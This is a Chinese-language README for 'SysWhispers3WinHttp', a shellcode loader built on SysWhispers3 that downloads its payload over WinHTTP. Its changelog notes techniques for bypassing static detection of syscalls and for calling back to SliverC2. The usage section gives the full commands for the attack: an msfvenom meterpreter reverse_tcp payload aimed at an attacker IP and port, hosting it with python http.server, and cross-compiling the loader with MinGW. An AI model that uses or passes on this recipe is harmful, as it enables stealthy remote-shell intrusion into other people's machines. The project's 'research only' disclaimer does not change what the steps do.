SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,在Linux下使用GCC进行交叉编译。
该项目仅供安全研究使用,禁止使用该项目进行违法操作,否则由使用者承担全部法律及连带责任。
2024/06/21 增添MinGW下EggHunter技术,绕过对syscall指令的静态检测。
2023/07/03 支持64位程序在Windows 7 x64上线。
2023/06/06 支持64位GCC编译与Stager方式上线SliverC2,增添编译参数绕过静态检测。
// 1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=x.x.x.x lport=4444 -f raw -o beacon.bin
// 2. 使用python3开启Web服务(或使用CobaltStrike之HostFile功能)
python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c第72行IP地址,使用Linux64位GCC进行交叉编译
x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi
// ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第72行IP地址,使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi
https://github.com/klezVirus/SysWhispers3
https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect